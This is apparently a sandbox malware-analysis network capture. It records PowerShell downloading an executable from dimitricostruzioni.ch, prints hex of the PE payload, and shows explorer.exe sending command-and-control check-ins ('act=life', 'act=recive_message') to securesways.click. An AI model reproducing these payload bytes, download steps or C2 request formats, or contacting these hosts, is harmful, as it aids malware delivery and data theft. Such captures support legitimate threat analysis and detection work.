                                                                                                                                                                                                                                              Data Ascii: &q\U(]q8vx('N|+{/5iR^qRQY=6m^2t/3g~}^M'Mc(^}eu30=2ou4w/p^;:'O;w{{KzDSN\iE2{?~@H2L1L-^d5,X=9sf
                                                                                                                                                                                                                                              2024-12-21 13:59:09 UTC16384INData Raw: bd e6 e1 53 5e 77 e5 d1 47 14 7d 2d a3 10 a6 8c 31 c6 18 63 8c 69 c3 11 a6 f6 8a 30 05 90 33 61 ca 18 63 8c 31 c6 98 36 1c 61 6a af 08 53 00 39 13 a6 8c 31 c6 18 63 8c 69 c3 11 a6 f6 8a 30 05 90 33 61 ca 18 63 8c 31 c6 98 36 1c 61 6a af 08 53 00 39 13 a6 8c 31 c6 18 63 8c 69 c3 11 a6 f6 8a 30 05 90 b3 54 98 7a 83 30 65 8c 31 c6 18 63 4c 9b cc 88 61 ea 15 c2 d4 ff 42 98 02 c8 59 23 4c f5 7d e5 1d c3 3f b6 2a ff f2 0f d1 ca bb aa e5 95 e9 a9 c5 51 d1 cf e6 41 71 b5 37 b9 9e e8 de a3 a3 a5 e7 ee 76 91 01 66 c7 fc e8 ee e7 47 ab 3e 1a 7e f3 a6 5f 44 77 1f 59 5d f7 8d e0 9b a3 35 9f 8f e6 be b0 ba e9 57 a1 37 af 88 96 5f 14 dd fb 92 ea 8e 05 81 37 97 96 47 8b ff 39 ba ff 75 e1 5f e4 d2 d2 68 fe 1b a2 87 fe 31 fc e6 de 85 d1 dc 69 d1 ca 4b 82 6f 8e 36 ff 36 ba
                                                                                                                                                                                                                                              Data Ascii: S^wG}-1ci03ac16ajS91ci03ac16ajS91ci0Tz0e1cLaBY#L}?*QAq7vfG>~_DwY]5W7_7G9u_h1iKo66
                                                                                                                                                                                                                                              2024-12-21 13:59:09 UTC16384INData Raw: 1c c3 94 46 23 c3 94 78 1d c3 94 38 86 29 05 0c 53 e2 18 a6 54 1a 19 a6 14 30 4c 01 40 14 30 4c 8d ea 3d 91 61 4a 1a c3 94 3c 86 29 8d 46 86 29 f1 46 86 29 71 0c 53 f2 7d 0c 53 0a 8d 0c 53 e2 18 a6 00 00 e5 82 61 6a 54 ef 89 0c 53 d2 18 a6 e4 31 4c 69 34 32 4c 89 37 32 4c 89 63 98 92 ef 63 98 52 68 64 98 12 c7 30 05 00 28 17 0c 53 a3 7a 4f 64 98 92 c6 30 25 8f 61 4a a3 91 61 4a bc 91 61 4a 1c c3 94 7c 1f c3 94 42 23 c3 94 38 86 29 00 40 b9 60 98 1a d5 7b 22 c3 94 34 86 29 79 0c 53 1a 8d 0c 53 e2 8d 0c 53 e2 18 a6 e4 fb 18 a6 14 1a 19 a6 c4 31 4c 01 00 ca 05 c3 d4 a8 de 13 19 a6 a4 31 4c c9 63 98 d2 68 64 98 12 6f 64 98 12 c7 30 25 df c7 30 a5 d0 c8 30 25 8e 61 0a 00 50 2e f6 a9 aa 58 fe d5 cf 6f 38 fb e4 5b 3e 7e 64 a1 1f 4b 1e 0c 53 8a 18 a6 c4 31 4c 69
                                                                                                                                                                                                                                              Data Ascii: F#x8)ST0L@0L=aJ<)F)F)qS}SSajTS1Li42L72LccRhd0(SzOd0%aJaJaJ|B#8)@`{"4)ySSS1L1Lchdod0%00%aP.Xo8[>~dKS1Li
                                                                                                                                                                                                                                              2024-12-21 13:59:09 UTC16384INData Raw: 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92
                                                                                                                                                                                                                                              Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                                                                                                                                                                              2024-12-21 13:59:09 UTC16384INData Raw: 01 db e9 ef 1a 09 02 38 16 7d 56 7e ea fe f4 8f 99 a5 71 c0 bf 49 25 59 4f c0 34 f4 33 05 0e ac e0 83 6d 68 e4 7e ec 97 a9 68 8e 91 dd a0 05 83 f6 2e 6d 00 cb f7 c8 39 f9 3d ac 20 23 5c 0a a7 d1 f2 5a 8d 8e e7 34 47 40 37 5a 0b b9 a3 89 ce e7 ce 77 bb 21 8c cc 1e 5d 70 24 48 a2 fa bb c8 4f dd 40 ee 63 46 1f d7 2e a0 33 05 5e 5b 0f 4f b0 a1 fe 44 c6 bf 14 74 db 60 f3 5f de 4a 85 ff ee a0 e9 81 55 7f 4d 3b fe 7c 98 ff b7 1e 8b 0a ff 58 d0 3c 04 ab ff 94 8e f6 87 d0 f5 a5 76 ab a1 fb bf 66 44 2a fc bd 80 9f 07 4b ff 9a 76 dc 75 30 ef 6f 3d 96 7f 46 e0 66 c3 e0 3f 7a 0c 2a a8 a0 82 0a ff 93 80 f7 c2 4d ff e8 31 a8 a0 c2 b9 40 b3 ef af 7b a6 52 41 05 15 54 50 41 05 15 54 50 41 05 15 54 50 41 05 15 54 50 41 05 15 54 50 41 05 15 54 50 41 05 15 54 50 41 05 15 54
                                                                                                                                                                                                                                              Data Ascii: 8}V~qI%YO43mh~h.m9= #\Z4G@7Zw!]p$HO@cF.3^[ODt`_JUM;|X<vfD*Kvu0o=Ff?z*M1@{RATPATPATPATPATPATPATPAT
                                                                                                                                                                                                                                              2024-12-21 13:59:09 UTC16384INData Raw: 8e f9 4e fa ce f8 ce fb be f6 5d f1 5d f7 73 fe 2c bf de 2f fb 6d 7e cd ef f5 97 f8 7b fb fb fb 07 fb 87 fb 47 f9 c7 fa c7 fb 23 fe b8 7f 92 7f 9a 7f ba 7f 96 7f ae 6b be 7f a1 7f 99 7f 95 7f 9d 7f a3 7f ab 7f b7 bf cd 7f d4 7f c2 7f da 7f ce 7f d1 7f d9 7f ad 88 68 c9 a2 cc 22 7d 91 b9 c8 59 e4 2d 2a 29 ea 5d d4 bf 68 70 51 59 51 79 d1 e8 a2 b1 45 55 45 13 8a ea f2 8f 14 35 14 4d 2b 9a 51 34 a7 68 61 d1 b2 a2 55 45 eb 8a 36 16 6d 29 da 51 b4 b7 a8 ad e8 48 d1 f1 a2 53 45 67 8b 2e 14 5d 2a ba 5a 74 23 20 04 72 02 c6 80 39 60 0f b8 03 fe 40 49 e0 ae 40 df 40 69 60 70 a0 2c 50 1e 18 1d 18 1b a8 0a 4c 08 d4 05 1a 02 53 03 cd 81 96 c0 9c c0 82 c0 92 c0 f2 c0 aa c0 da c0 fa c0 a6 c0 d6 c0 ce c0 fe c0 a1 c0 d1 c0 89 c0 e9 c0 b9 c0 c5 c0 e5 c0 b5 3b c8 1d 99 77
                                                                                                                                                                                                                                              Data Ascii: N]]s,/m~{G#kh"}Y-*)]hpQYQyEUE5M+Q4haUE6m)QHSEg.]*Zt# r9`@I@@i`p,PLS;w
                                                                                                                                                                                                                                              2024-12-21 13:59:09 UTC456INData Raw: 30 30 20 6e 0d 0a 30 30 30 30 30 38 31 32 31 34 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 31 30 37 31 39 38 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 31 30 37 38 30 32 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 31 30 37 38 33 30 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 31 31 31 30 30 38 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 31 31 31 30 35 34 20 30 30 30 30 30 20 6e 0d 0a 74 72 61 69 6c 65 72 0d 0a 3c 3c 2f 53 69 7a 65 20 31 34 39 2f 52 6f 6f 74 20 31 20 30 20 52 2f 49 6e 66 6f 20 31 37 20 30 20 52 2f 49 44 5b 3c 32 39 42 32 46 37 30 38 46 33 43 41 38 43 34 46 39 43 36 46 33 38 43 30 35 34 37 42 43 34 33 39 3e 3c 32 39 42 32 46 37 30 38 46 33 43 41 38 43 34 46 39 43 36 46 33 38 43 30 35 34 37 42 43 34 33 39 3e 5d 20 3e 3e 0d 0a 73 74 61 72 74 78 72 65
                                                                                                                                                                                                                                              Data Ascii: 00 n0000081214 00000 n0000107198 00000 n0000107802 00000 n0000107830 00000 n0000111008 00000 n0000111054 00000 ntrailer<</Size 149/Root 1 0 R/Info 17 0 R/ID[<29B2F708F3CA8C4F9C6F38C0547BC439><29B2F708F3CA8C4F9C6F38C0547BC439>] >>startxre


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49710 | 62.182.21.105 | 443 | 3396 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-21 13:59:11 UTC | 67 | OUT | GET /dimitri/TCUINOVJ.exe HTTP/1.1
Host: dimitricostruzioni.ch
2024-12-21 13:59:11 UTC | 227 | IN | HTTP/1.1 200 OK
Connection: close
content-type: application/x-msdownload
last-modified: Fri, 20 Dec 2024 17:38:53 GMT
accept-ranges: bytes
content-length: 4151808
date: Sat, 21 Dec 2024 13:59:11 GMT
server: LiteSpeed
                                                                                                                                                                                                                                              2024-12-21 13:59:11 UTC16384INData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 7e f8 26 4c 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 14 01 00 00 c8 01 00 00 00 00 00 ef 1d 01 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 03 00 00 02 00 00 02 33 03 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 50 01 00 b4 00 00 00 00 a0 01 00 04 8d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii: MZ`@`!L!Require Windows$PEL~&L0@03P
                                                                                                                                                                                                                                              2024-12-21 13:59:11 UTC16384INData Raw: e8 80 cc ff ff 83 c4 0c 85 c0 75 24 8b 06 8b 4d 08 66 83 7c 08 02 25 75 17 8d 43 02 50 57 8b ce e8 8c d8 ff ff ff 75 10 8b ce 57 e8 66 e1 ff ff 83 45 08 02 47 3b 7e 04 7c b1 5f 5e 5b 5d c3 55 8b ec 83 ec 70 56 8b 75 0c 57 68 28 73 41 00 8b ce e8 30 f0 ff ff 8b 7d 10 68 3c 73 41 00 8b cf e8 21 f0 ff ff 8b 46 04 48 50 6a 00 8d 45 f4 50 8b ce e8 cc f4 ff ff 8d 45 f4 50 8b ce e8 3f f0 ff ff ff 75 f4 e8 74 cd 00 00 8b 47 04 59 48 50 6a 00 8d 45 f4 50 8b cf e8 a6 f4 ff ff 8d 45 f4 50 8b cf e8 19 f0 ff ff ff 75 f4 e8 4e cd 00 00 ff 75 08 8d 45 90 68 dc 44 41 00 50 ff 15 cc 32 41 00 83 c4 10 8d 45 90 50 8b ce e8 26 f0 ff ff 8d 45 90 50 8b cf e8 1b f0 ff ff 5f 5e c9 c3 55 8b ec 83 ec 18 53 56 57 ff 75 08 8d 4d e8 e8 09 d6 ff ff 8d 45 e8 68 88 77 41 00 50 e8 7f e9
                                                                                                                                                                                                                                              Data Ascii: u$Mf|%uCPWuWfEG;~|_^[]UpVuWh(sA0}h<sA!FHPjEPEP?utGYHPjEPEPuNuEhDAP2AEP&EP_^USVWuMEhwAP
                                                                                                                                                                                                                                              2024-12-21 13:59:11 UTC16384INData Raw: ff 74 0e 8b cf e8 2e fd ff ff 57 e8 ee 8d 00 00 59 83 c6 04 ff 4d fc 75 e0 5f ff 75 0c 8b cb ff 75 08 e8 e3 5a 00 00 5e 5b c9 c2 08 00 56 8b 74 24 08 ff 4e 08 8b 46 08 75 10 8b ce e8 c4 fe ff ff 56 e8 b7 8d 00 00 59 33 c0 5e c2 04 00 56 8b f1 8d 4e 04 e8 c8 fe ff ff 8d 46 78 33 c9 89 4e 74 89 48 04 89 48 08 89 48 0c c7 40 10 04 00 00 00 c7 00 f4 48 41 00 c6 46 68 01 88 0e 8b c6 5e c2 04 00 56 57 8b 7c 24 0c 57 8b f1 e8 b5 fe ff ff 83 c7 50 57 8d 4e 50 e8 af fa ff ff 5f 8b c6 5e c2 04 00 55 8d 6c 24 a4 81 ec f4 00 00 00 56 8b 75 74 89 4d 58 8b ce e8 36 20 00 00 84 c0 75 0d b8 01 40 00 80 5e 83 c5 5c c9 c2 1c 00 53 33 db 8d 45 d0 57 50 89 5d 2c 89 5d 30 89 5d 34 c7 45 38 04 00 00 00 c7 45 28 f4 48 41 00 89 5d cc e8 f5 d6 ff ff 59 ff 75 64 8d 4d cc e8 25 f8
                                                                                                                                                                                                                                              Data Ascii: t.WYMu_uuZ^[Vt$NFuVY3^VNFx3NtHHH@HAFh^VW|$WPWNP_^Ul$VutMX6 u@^\S3EWP],]0]4E8E(HA]YudM%
                                                                                                                                                                                                                                              2024-12-21 13:59:11 UTC16384INData Raw: eb 02 33 c0 50 8b cb e8 55 b9 ff ff 5b c2 04 00 8b c1 8b 4c 24 04 c7 00 08 4a 41 00 8b 51 04 89 50 04 8b 51 08 89 50 08 8b 51 0c 89 50 0c 8a 49 10 88 48 10 c2 04 00 53 55 8b 6c 24 0c 56 57 8b 7d 08 8b f1 8b 46 08 03 c7 50 e8 c2 19 00 00 33 db 85 ff 7e 12 8b 45 0c ff 34 98 8b ce e8 ff b8 ff ff 43 3b df 7c ee 5f 8b c6 5e 5d 5b c2 04 00 53 56 8b f1 8d 9e a0 00 00 00 57 8b cb e8 58 1a 00 00 8d 8e b4 00 00 00 e8 4d 1a 00 00 33 ff 39 7e 1c 76 2b 8b 46 58 8d 04 b8 83 38 00 74 08 8b 4e 30 8d 0c f9 89 08 8b 86 84 00 00 00 8b 04 b8 ff 30 8b cb e8 a8 b8 ff ff 47 3b 7e 1c 72 d5 33 ff 39 7e 20 76 2f 8b 46 6c 8d 04 b8 83 38 00 74 08 8b 4e 44 8d 0c f9 89 08 8b 86 98 00 00 00 8b 04 b8 ff 30 8d 8e b4 00 00 00 e8 72 b8 ff ff 47 3b 7e 20 72 d1 8b 5e 14 85 db 8b 96 c0 00 00
                                                                                                                                                                                                                                              Data Ascii: 3PU[L$JAQPQPQPIHSUl$VW}FP3~E4C;|_^][SVWXM39~v+FX8tN00G;~r39~ v/Fl8tND0rG;~ r^
                                                                                                                                                                                                                                              2024-12-21 13:59:11 UTC16384INData Raw: 50 04 8b c8 f7 d9 1b c9 23 ca 8b 55 10 89 0a eb bc 68 c8 48 41 00 56 e8 56 06 ff ff 85 c0 59 59 74 08 8b 45 08 8d 50 08 eb d8 68 98 48 41 00 56 e8 3d 06 ff ff 85 c0 59 59 74 08 8b 45 08 8d 50 0c eb bf 68 b8 48 41 00 56 e8 24 06 ff ff 85 c0 59 59 74 08 8b 45 08 8d 50 10 eb a6 68 18 48 41 00 56 e8 0b 06 ff ff 85 c0 59 59 74 08 8b 45 08 8d 50 14 eb 8d b8 02 40 00 80 5e 5d c2 0c 00 56 8b 74 24 08 68 80 76 41 00 ff 74 24 14 8d 46 28 ff 74 24 14 50 e8 be fd ff ff 83 c4 10 e8 1e e5 ff ff 85 c0 75 0f 8d 4e fc c6 86 98 00 00 00 01 e8 78 e5 ff ff 5e c2 0c 00 8b 54 24 04 85 d2 0f 95 c0 84 c0 88 81 9d 00 00 00 74 11 8b 02 89 81 a0 00 00 00 8b 42 04 89 81 a4 00 00 00 83 a1 b0 00 00 00 00 83 a1 b4 00 00 00 00 83 a1 c4 00 00 00 00 83 c1 2c 51 e8 44 f9 ff ff 59 c2 04 00
                                                                                                                                                                                                                                              Data Ascii: P#UhHAVVYYtEPhHAV=YYtEPhHAV$YYtEPhHAVYYtEP@^]Vt$hvAt$F(t$PuNx^T$tB,QDY
                                                                                                                                                                                                                                              2024-12-21 13:59:12 UTC16384INData Raw: 72 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 00 00 51 02 4c 65 61 76 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 00 00 8e 03 57 61 69 74 46 6f 72 4d 75 6c 74 69 70 6c 65 4f 62 6a 65 63 74 73 00 00 4b 45 52 4e 45 4c 33 32 2e 64 6c 6c 00 00 d8 02 77 73 70 72 69 6e 74 66 57 00 40 02 53 65 6e 64 4d 65 73 73 61 67 65 57 00 00 c6 00 45 6e 64 44 69 61 6c 6f 67 00 37 00 43 68 61 72 55 70 70 65 72 57 00 00 99 00 44 65 73 74 72 6f 79 57 69 6e 64 6f 77 00 b5 01 4b 69 6c 6c 54 69 6d 65 72 00 a2 00 44 69 73 70 61 74 63 68 4d 65 73 73 61 67 65 57 00 00 3e 01 47 65 74 4d 65 73 73 61 67 65 57 00 7a 02 53 65 74 54 69 6d 65 72 00 00 61 00 43 72 65 61 74 65 57 69 6e 64 6f 77 45 78 57 00 31 02 53 63 72 65 65 6e 54 6f 43 6c 69 65 6e 74 00 00 74 01 47 65 74 57 69 6e 64
                                                                                                                                                                                                                                              Data Ascii: rCriticalSectionQLeaveCriticalSectionWaitForMultipleObjectsKERNEL32.dllwsprintfW@SendMessageWEndDialog7CharUpperWDestroyWindowKillTimerDispatchMessageW>GetMessageWzSetTimeraCreateWindowExW1ScreenToClienttGetWind
                                                                                                                                                                                                                                              2024-12-21 13:59:12 UTC16384INData Raw: 0b 67 a0 a1 4b 9b cd ff 71 bb ea ff 6f ba ea ff 6f ba ea ff 6f ba e9 ff 6f b9 ea ff 6f ba ea ff 6f ba ea ff 6f b9 ea ff 6f ba ea ff 6f ba ea ff 6f b9 ea ff 6f ba ea ff 6f ba ea ff 6f b9 ea ff 6f ba ea ff 6f ba ea ff 6e ba ea ff 6f ba ea ff 6e b9 e9 ff 6d b9 e9 ff 6c b8 e8 ff 6b b7 e7 ff 69 b6 e7 ff 68 b4 e6 ff 66 b3 e4 ff 64 b1 e3 ff 61 b0 e2 ff 5f ae e0 ff 5d ac df ff 5d ac de ff 53 a0 d1 ff 33 81 b2 b5 24 78 a9 03 33 81 b2 13 1a 70 a7 8f 10 6b a4 f9 0c 67 a0 f5 00 66 99 03 00 00 00 03 00 00 00 01 00 00 00 03 0b 66 a0 85 35 8c c4 ff 60 b0 e4 ff 34 89 be ff 19 70 a6 cd 1c 72 a8 8b 32 87 bc ff 6f ba e9 ff 6e ba e9 ff 6f ba e9 ff 6f ba e9 ff 6f ba ea ff 6f ba ea ff 6f ba ea ff 6f ba ea ff 6f ba ea ff 6f ba ea ff 6f ba ea ff 6f ba ea ff 6f ba ea ff 6f ba ea
                                                                                                                                                                                                                                              Data Ascii: gKqooooooooooooooononmlkihfda_]]S3$x3pkgff5`4pr2onoooooooooooo
                                                                                                                                                                                                                                              2024-12-21 13:59:12 UTC16384INData Raw: 10 4b 72 ff 10 4b 72 ff 10 4b 72 ff 10 4b 72 ff 10 4b 72 ff 10 4a 71 ff 10 4a 71 ff 10 4a 71 ff 10 4a 71 ff 0f 4a 71 ff 0f 4a 71 ff 0f 4a 71 ff 0f 4a 71 ff 0f 4a 70 ff 0f 4a 70 ff 0f 4a 70 ff 0f 4a 70 ff 0f 49 6f ff 0f 49 6f ff 0f 49 6f ff 0f 49 6f ff 0f 49 6f ff 0f 49 6f ff 0f 49 6f ff 0f 49 6f ff 0f 48 6e ff 0f 48 6e ff 0f 48 6e ff 0f 48 6e ff 0f 48 6e ff 0f 48 6e ff 0f 48 6d ff 0f 48 6d ff 0f 47 6d ff 0f 47 6d ff 0f 47 6d ff 0f 47 6d ff 0f 47 6d ff 43 7a 9d ff b1 da f3 ff b6 dc f4 ff a9 d5 f2 ff 9b cf f0 ff 8e c8 ee ff 81 c2 ec ff 4f 9d d0 ff 0c 67 a0 f9 15 6a aa 05 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 0c 67 9f 49 0c 67 a0 ff 4c 97 c7 ff 92 ca ee ff 9b ce f0 ff a2 d2 f1 ff a9 d6 f2 ff 80 b6 d9 ff 6b a4 c9 ff 11 51 7b
                                                                                                                                                                                                                                              Data Ascii: KrKrKrKrKrJqJqJqJqJqJqJqJqJpJpJpJpIoIoIoIoIoIoIoIoHnHnHnHnHnHnHmHmGmGmGmGmGmCzOgjgIgLkQ{
                                                                                                                                                                                                                                              2024-12-21 13:59:12 UTC16384INData Raw: c1 c1 c1 ff c2 c2 c2 ff c7 c7 c7 ff cf cf cf ff d0 d0 d0 ff bc bc bc ff 80 80 80 ff 80 80 80 ff 77 77 77 cd 05 05 05 37 00 00 00 37 00 00 00 37 00 00 00 37 00 00 00 37 00 00 00 37 00 00 00 37 00 00 00 37 00 00 00 37 00 00 00 37 00 00 00 37 00 00 00 37 00 00 00 37 00 00 00 37 00 00 00 35 00 00 00 35 00 00 00 35 00 00 00 35 00 00 00 35 00 00 00 35 00 00 00 33 00 00 00 33 00 00 00 31 00 00 00 31 00 00 00 2f 00 00 00 2b 00 00 00 29 00 00 00 25 00 00 00 23 00 00 00 1f 00 00 00 1b 00 00 00 17 00 00 00 15 00 00 00 11 00 00 00 0d 00 00 00 0b 00 00 00 09 00 00 00 05 00 00 00 05 00 00 00 03 00 00 00 03 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                                                                                                              Data Ascii: www777777777777775555553311/+)%#
                                                                                                                                                                                                                                              2024-12-21 13:59:12 UTC16384INData Raw: de de de ff e0 e0 e0 ff e1 e1 e1 ff e2 e2 e2 ff e3 e3 e3 ff e4 e4 e4 ff e9 e9 e9 ff ec ec ec ff e9 e9 e9 ff 89 89 89 ff 80 80 80 ff 6f 87 97 ff 42 98 d0 ff 42 98 d0 ff 42 98 d0 ff 42 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 5c a6 d6 ff 79 b6 dd ff 79 b6 dd ff 2b 80 b5 ff 0c 67 a0 ff 0c 67 a0 ff 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                                                                                                              Data Ascii: oBBBBCCCCCCCCCCCCCCCC\yy+gg


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49803 | 104.21.16.1 | 443 | 940 | C:\Windows\SysWOW64\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-21 13:59:54 UTC | 264 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: securesways.click
2024-12-21 13:59:54 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-21 13:59:56 UTC | 1132 | IN | HTTP/1.1 200 OK
Date: Sat, 21 Dec 2024 13:59:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=1qt3fece0chs0fgivckd80anu6; expires=Wed, 16 Apr 2025 07:46:35 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XSeIvVPl4ihYQQmPtCBmkkFIDloIpRDkn05Rzm2QRZ3KKeCXALTVPzYyEu%2BsSbvnxetEGohFlJjQc%2BvgxHAuMugZ%2B4stYUsUtbIXRb1gKLpNco7%2BJZFtP5dmF1IZ3OLxDs0z2g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f58653459b01881-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1560&rtt_var=601&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=908&delivery_rate=1795817&cwnd=238&unsent_bytes=0&cid=80c52c5e7ffd3180&ts=2935&x=0"
                                                                                                                                                                                                                                              2024-12-21 13:59:56 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                                                                                              2024-12-21 13:59:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


Session ID: 4
Source IP: 192.168.2.5 | Source Port: 49815 | Destination IP: 104.21.16.1 | Destination Port: 443 | PID: 940 | Process: C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-21 13:59:58 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 42
Host: securesways.click
2024-12-21 13:59:58 UTC | 42 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 41 42 31 35 67 31 2d 2d 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=AB15g1--&j=
2024-12-21 13:59:59 UTC | 1133 | IN | HTTP/1.1 200 OK
Date: Sat, 21 Dec 2024 13:59:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=hjv6nuq6bl12qdgr4vdpbcgicf; expires=Wed, 16 Apr 2025 07:46:37 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=72h7qf0S%2FW9zRoT64U4ON8h4Kl4tFqLdM4ffCADb2j9dENRBrkWERaOuMlQ%2BDC1Bj68bn%2FGBNZhd9lOa0H5yz%2Fm4IfXnYx9cGNMj9ji6uFJdJZPPXS2X11ybctFoQsIg%2FYTbiw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f58654e4c2f7293-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2024&min_rtt=2016&rtt_var=773&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=943&delivery_rate=1399137&cwnd=158&unsent_bytes=0&cid=51d7391720ebc248&ts=864&x=0"
